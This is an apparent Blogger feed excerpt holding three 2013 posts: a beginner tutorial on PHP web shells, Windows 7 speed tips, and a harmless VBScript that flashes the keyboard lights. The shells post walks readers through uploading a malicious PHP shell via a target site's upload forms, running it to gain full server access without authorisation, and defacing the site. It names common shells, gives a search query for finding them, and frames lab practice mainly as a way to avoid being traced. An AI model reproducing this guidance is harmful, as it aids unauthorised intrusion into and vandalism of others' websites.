&lt;h4 style=&quot;background-color: white; border-bottom-color: rgb(0, 128, 255); border-bottom-style: dashed; border-bottom-width: 1px; border-top-color: rgb(0, 128, 255); border-top-style: dashed; border-top-width: 1px; color: #0080ff; font-family: Verdana, sans-serif; font-size: 12pt; line-height: 20px; padding: 3px; text-align: center;&quot;&gt;
Difference between FTP &amp;amp; Shells:&lt;/h4&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Many times I see that some of us know how to use the shell but once they have uploaded they get confused. So to start with, Let me give you some information about FTP:&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;File Transfer Protocol&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Whenever you want to open your website, the first thing you will do is to get some web hosting for your self. That cud be either free or paid. When your get your hosting services, you create a website on your computer first and then upload it to your hosting server so it becomes a World Wide Web. This process of uploading the documents from your computer to your hosting server is done through FTP [File Transfer Protocol]. It basically looks like a program with 2 columns, one column shows your computer files and another shows your servers files. Just like when you copy the stuffs from some USB drive to your computer. So here, I will show you an example is how you would connect if you own example.com. So when you want to connect your self to your web hosting server, following information is required in order to authenticate yourself:&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Server : ftp.example.com&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Username: XEO&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Password: whatever&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;So, once you put in this information, server understands that you are XEO and gives you access to all the files on the server so you can work on it.&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&amp;nbsp;&amp;nbsp;&lt;b&gt;Shells&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Since you understand the FTP now, we know that none of us will get access to Go4expert&#39;s server because we don&#39;t have the username and password authenticate yourself. Somehow we can manage to get the access to G4E&#39;s FTP we can easily remove/edit/replace files. So we can destroy this entire forum and upload our own stuffs. That is when shells comes into the picture. Shells are a malicious PHP files which you will need to upload to any website, and once you execute it you will get access to its server directly&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;WITHOUT&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;&amp;nbsp;authenticating your self.&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;Moral of the Story:&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;I wrote the difference between FTP and shells so that you guyz can understand it, because lots of people tends to get confused between them. So again to make it clear, you can following thing:&lt;/span&gt;&lt;br /&gt;
&lt;div class=&quot;notice&quot; style=&quot;background-color: #fff6bf; border: 2px solid rgb(255, 211, 36); color: #514721; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; margin: 15px 35px 15px 15px; padding: 0.8em;&quot;&gt;
FTP is a protocol that lets you connect your computer to your hosting server so that you can upload/edit/delete/replace your files. Since we wouldn&#39;t have the username &amp;amp; password to connect to any website&#39;s ftp, thats why we will use the SHELL to get access.&amp;nbsp;&lt;b&gt;SO SHELL IS NOT FTP BUT IT GIVES YOU ACCESS TO THE HOSTING SERVER&lt;/b&gt;.&lt;/div&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;Funny Incidents:&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Let me tell you guyz why i gave time to write this much about FTP in this article.I remember i saw couple of threads which said following thing:&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;i style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;&quot;Hi guyz, i managed to hack my 1st website today! YAY, I am really happy! But theres only 1 problem, i uploaded the shell and ran it and it worked fine. The only problem is i dont have access to FTP.&quot;&lt;/i&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;i style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Y0, i hacked a website today, uploaded a shell and it worked fine, now i am trying to get access to FTP&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;Main Logic&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Shell is not a tool that you can run and complete your work. As I said, its just a normal &quot;.php&quot; file, you have to find a way in any website to upload that shell. The Idea is, you upload the shell to any website so it will be saved on their server and it will give you the access to it.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;h4 style=&quot;background-color: white; border-bottom-color: rgb(0, 128, 255); border-bottom-style: dashed; border-bottom-width: 1px; border-top-color: rgb(0, 128, 255); border-top-style: dashed; border-top-width: 1px; color: #0080ff; font-family: Verdana, sans-serif; font-size: 12pt; line-height: 20px; padding: 3px; text-align: center;&quot;&gt;
Phase 1 : Uploading a shell:&lt;/h4&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Suppose you want to hack &quot;something.com&quot;. So the first thing that you will do is, open up &quot;something.com&quot;, and try to find some place from where you can upload the files on the website. There are many such places for example, &quot;file uploads, avatars, resume upload, cooking recipe uploads, upload your photo&quot;. So these are the places which will give you an opportunity to upload your shell. All you have to do is, try to upload the shell.php which is located in your computer and click on submit. So suppose you went to the webpage &quot;something.com/submit_resume.php&quot; and you uploaded your resume.&lt;/span&gt;&lt;br /&gt;
&lt;h4 style=&quot;background-color: white; border-bottom-color: rgb(0, 128, 255); border-bottom-style: dashed; border-bottom-width: 1px; border-top-color: rgb(0, 128, 255); border-top-style: dashed; border-top-width: 1px; color: #0080ff; font-family: Verdana, sans-serif; font-size: 12pt; line-height: 20px; padding: 3px; text-align: center;&quot;&gt;
Phase 2 : Executing your uploaded shelll:&lt;/h4&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Once we have uploaded the shell as shown in &quot;Phase:1&quot;, we know that its sitting on the server. The only thing we need to do now is to execute the shell from a browser so we get access to it.&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;Example:&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;So suppose i uploaded my shell as an attachment in any thread. SO now that attachment is sitting on that thread&#39;s server. Now if we want to executive it, we will use following URL:&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Code:&amp;nbsp;&lt;/span&gt;&lt;a href=&quot;http://www.something.com/forums/attachment.php?attachmentid=456&amp;amp;d=1249607339&quot; rel=&quot;nofollow&quot; style=&quot;background-color: white; color: #2f97ff; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; outline: none; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://www.something.com/forums/attachment.php?attachmentid=456&amp;amp;d=1249607339&lt;/a&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;So that is the DIRECT url to the attachment which is called EXECUTION. In the same way if you execute your shell, it will take you to a webpage where you will see everything thats on the server. And you will have&amp;nbsp;&lt;/span&gt;&lt;b style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;FULL ACCESS&amp;nbsp;&lt;/b&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;to remove/edit/replace/delete the files. So you are another&amp;nbsp;&lt;/span&gt;&lt;i style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;XEO&amp;nbsp;&lt;/i&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;!&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;h4 style=&quot;background-color: white; border-bottom-color: rgb(0, 128, 255); border-bottom-style: dashed; border-bottom-width: 1px; border-top-color: rgb(0, 128, 255); border-top-style: dashed; border-top-width: 1px; color: #0080ff; font-family: Verdana, sans-serif; font-size: 12pt; line-height: 20px; padding: 3px; text-align: center;&quot;&gt;
Phase 3 : Defacing:&lt;/h4&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Defacing is a word which means &quot;replacing the current index file with our own index with our motive and slogan on it&quot;. So once you have access to the server, you are the king&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;Different types of shells:&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;There are many shells available, most of them are public and some of them are private. Most of them does the samething to give you the access of the server. &quot;c99, r57, b0yzone, j32&quot; are some very common and easily available shells.&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px; list-style: none;&quot;&gt;
&lt;li style=&quot;background-attachment: scroll; background-color: transparent; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEge_uKxqtkBWJO9hOTciypeqi05qVi4E7MPKKkHYNkkEQLUZEnT-wDRW-_y1XK3rrBRa2GHETNtWsJ5ufbjiIZRR4S8Z4Dqs_fbosKTY0DcoSiRO-6-Mt3uEEnFLPwvNgXLQ8whSuUgKqc/s400/265.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;&quot;&gt;&lt;b&gt;Where do I get them from?&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;The best way is Google search with &quot;inurl:c99.txt&quot;. You can replace c99 with r57, j32 or anything else.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;h4 style=&quot;background-color: white; border-bottom-color: rgb(0, 128, 255); border-bottom-style: dashed; border-bottom-width: 1px; border-top-color: rgb(0, 128, 255); border-top-style: dashed; border-top-width: 1px; color: #0080ff; font-family: Verdana, sans-serif; font-size: 12pt; line-height: 20px; padding: 3px; text-align: center;&quot;&gt;
Important Piece of advice&lt;/h4&gt;
&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;I would suggest you to download WAMP SERVER, which lets you make your own server on your comptuer. And then try to use shells on it. Which will help you avoid hacking in live environment. Because, if webmaster is smart then, he can simply check the logs for that shell fine and track down your IP which executed the shell. Then you might be in problem.&lt;/span&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;br style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot; /&gt;&lt;span style=&quot;background-color: white; font-family: Verdana, sans-serif; font-size: 12px; line-height: 20px;&quot;&gt;Thanks for your time to read the article . Hope you liked it . PEACE!&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/7529000591567527161/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/basics-about-shells.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/7529000591567527161'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/7529000591567527161'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/basics-about-shells.html' title='Basics about Shells'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-6544200499673442325</id><published>2013-07-17T08:42:00.005-07:00</published><updated>2013-07-29T05:23:36.345-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="windows"/><title type='text'>Speed up win7</title><content type='html'>&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;Speed up win 7&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
With the release of Windows 7, Microsoft may just have introduced the fastest operating system in the world. For those speed junkies who are never satisfied, we have provided a few tips that will help you make your PC even faster.&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Disable Automatic Disk Defragmentation&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
The Automatic Disk Defragmentation feature in Windows is designed to maintain the health of the operating system. However, it also makes Windows run a little slower. You can put an end to this by disabling the feature and manually running at your leisure. To do so, click “Start” and select “Computer.” Next, right click on your primary hard drive and select “Properties.” Lastly, select the “Tools” tab, click “Defragment Now” and uncheck the “Run on a schedule” option.&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Utilize ReadyBoost&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
ReadyBoost is a built-in Windows 7 feature that allows you to use a USB flash drive to enhance system performance. How is this possible? The drive itself acts as additional computer memory!&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
In order to make use of this feature, you will need a USB drive with at least 2 GB of space. From there, you simply connect the drive to your computer, click “Start” and select “Computer.” Next, click on the USB drive and select “ReadyBoost.” Lastly, select “Use this device” and choose as much capacity as possible below on the “Space to reserve for system speed” slide.&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Disable Windows Transparency&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
The transparency of windows is a great perk from a presentation aspect, but this may not be the case for those with older hardware as it can drastically impact performance. The good thing is that transparency can be disabled with ease. Simply right-click on your desktop, select “Personalize,” choose the active theme and then navigate to “Windows Color.” Finally, uncheck the “Enable Transparency” option.&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Disable Unwanted Features&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
There may be numerous Windows 7 features that you really don’t need. These same features could also slow down your computer. To disable them, click on “Start,” choose “Control Panel” and then select “Programs and features.” Next, select the “Turn Windows features on or off” option, navigate through the list and uncheck all the features you want to disable. Once you are done, simply click “OK” to remove those features.&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Disable Startup Services&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
Startup services are notorious for slowing down performance in XP and Vista. The same holds true for Windows 7. You can disable unwanted services by hitting “Start,” typing “msconfig” in the search bar and clicking “Enter.” Click the “Services Tab” on the next window and deselect the services you do not want to automatically run at startup. While this all depends on preference, services that impact performance the most include “Offline Files,” “Tablet PC Input Services,” Terminal Services,” “Fax” and “Windows Search.”&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Disable Minimizing/Maximizing Animations&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
Many users have already fallen in love with the minimizing and maximizing animation effects of windows. However, some may find it irritating after a while as it can eventually lead to slowdowns. If you want to disable this function, hit “Start,” enter “System Properties Performance” in the search bar and click “OK.” On the next screen, deselect the “Animate window when minimizing and maximizing” option and click “OK.”&lt;/div&gt;
&lt;h3 style=&quot;background-color: white; color: #333333; font-family: Bitter, serif; font-size: 1.538461538461538em; font-weight: normal; line-height: 1.3em; margin: 0px 0px 15px;&quot;&gt;
Update Your Windows 7 Drivers&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; font-size: 13px; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
Lastly, ensure that you have the latest device drivers made specifically for Windows 7. Since your PC can have hundreds of drivers installed in it at any given time, this task can be tedious. Luckily there are 3rd party utilities out thee such as&amp;nbsp;&lt;a class=&quot;external external_icon&quot; href=&quot;https://www.plimus.com/jsp/redirect.jsp?contractId=2812482&amp;amp;referrer=sniperspy&quot; rel=&quot;nofollow&quot; style=&quot;background-image: url(http://hackingarticles.com/wp-content/plugins/sem-external-links/external.png); background-position: 100% 50%; background-repeat: no-repeat no-repeat; color: #dd5424; padding-right: 13px; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;&lt;strong&gt;DriverFinder™&lt;/strong&gt;&lt;/a&gt;, which can greatly speed up this process.&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://toxiccloud.blogspot.com/feeds/6544200499673442325/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/speed-up-win7.html#comment-form' title='2 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/6544200499673442325'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3274283599470026861/posts/default/6544200499673442325'/><link rel='alternate' type='text/html' href='http://toxiccloud.blogspot.com/2013/07/speed-up-win7.html' title='Speed up win7'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/15337053438654229797</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>2</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3274283599470026861.post-2401268621164265647</id><published>2013-07-17T08:41:00.000-07:00</published><updated>2013-07-29T05:24:02.213-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type='text'>Make your keyboard go disco</title><content type='html'>&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
This trick just makes your keyboard lights go crazy and do disco. LoL.&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
1.This piece of code makes ur keyboard a live disco..&lt;span id=&quot;more-385&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;note&quot; style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
Set wshShell =wscript.CreateObject(“WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “{CAPSLOCK}”&lt;br /&gt;
wshshell.sendkeys “{NUMLOCK}”&lt;br /&gt;
wshshell.sendkeys “{SCROLLLOCK}”&lt;br /&gt;
loop&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
2.This one makes it looks like a chain of light….&lt;/div&gt;
&lt;div class=&quot;note&quot; style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
Set wshShell =wscript.CreateObject(“WScript.Shell”)&lt;br /&gt;
do&lt;br /&gt;
wscript.sleep 200&lt;br /&gt;
wshshell.sendkeys “{CAPSLOCK}”&lt;br /&gt;
wscript.sleep 100&lt;br /&gt;
wshshell.sendkeys “{NUMLOCK}”&lt;br /&gt;
wscript.sleep 50&lt;br /&gt;
wshshell.sendkeys “{SCROLLLOCK}”&lt;br /&gt;
loop&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
&lt;strong&gt;Instructions:&lt;/strong&gt;&lt;br /&gt;
*paste any of the two above codes in notepad&lt;br /&gt;
*Save as&lt;strong&gt;&amp;nbsp;“AnyFileName”.vbs&lt;/strong&gt;&lt;br /&gt;
*Run the file&lt;br /&gt;
*To stop, launch task manager and then under “&lt;strong&gt;Processes&lt;/strong&gt;” end “&lt;strong&gt;wscript.exe&lt;/strong&gt;”&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
I hope u would like it..&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #555555; font-family: Bitter, serif; line-height: 21.984375px; margin-bottom: 1.692307em;&quot;&gt;
